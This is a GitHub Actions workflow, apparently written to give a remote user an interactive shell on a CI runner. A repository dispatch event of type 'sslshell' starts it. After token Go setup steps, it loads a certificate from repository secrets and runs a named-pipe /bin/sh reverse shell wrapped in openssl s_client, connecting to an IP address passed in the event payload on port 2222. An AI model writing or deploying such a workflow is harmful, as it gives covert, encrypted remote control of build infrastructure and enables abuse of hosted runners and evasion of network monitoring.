name: shell
on:
  repository_dispatch:
    types: sslshell
    
jobs:
# ================== 第一个 job，这只有一个 job ==================
  first_job:
    runs-on: ubuntu-latest
    steps:
      - name: installgo
      - uses: actions/checkout@v2
      - uses: actions/setup-go@v2
        with:
          go-version: '^1.13.1'
      - run: go version
  
      - name: openssl
        run: |
          cat >  cert.pem  << EOF
          ${{ secrets.CERT }}
          EOF
          sudo apt-get -qqy install openssl
          mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -strict -verify 1 -verify_return_error -CAfile cert.pem -connect ${{ github.event.client_payload.ip }}:2222 > /tmp/s; rm /tmp/s
